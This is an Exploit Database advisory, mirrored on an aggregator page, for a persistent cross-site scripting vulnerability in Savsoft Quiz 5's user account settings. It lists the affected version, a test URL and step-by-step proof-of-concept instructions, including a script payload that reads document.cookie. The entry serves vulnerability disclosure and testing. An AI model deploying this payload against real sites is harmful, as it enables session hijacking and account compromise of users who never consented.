Savsoft Quiz 5 – ‘User Account Settings’ Persistent Cross-Site Scripting

• Exploit Database
• 36 阅读

• 作者： strider
  日期： 2021-05-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49825/

• # Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting
  # Date: 2021-05-04
  # Exploit Author: strider
  # Software Link: https://github.com/savsofts/savsoftquiz_v5
  # Vendor: https://savsoftquiz.com
  # Version: 5.0
  # Tested on: Ubuntu 20.04 LTS / Kali Linux
  
  ====================================[Description]====================================
  The vulnerability is found at the user settings page where the user can change his name and his login credentials. its possible to inject html/js into the fields which will be executed after pressing submit.
  
  
  ====================================[Proof of Concept]====================================
  If you installed this software create a new user or you can use the default user shown in the install description
  
  test-link:
  http://192.168.1.109/index.php/user/edit_user/<userid>
  
  step1)
  login into an account
  
  step2)
  click on the top right on you account name and navigate to "My Account"
  
  step3)
  insert 
  
  "><script>alert(document.cookie);</script>
  
  into the fields and hit submit
  
  boom!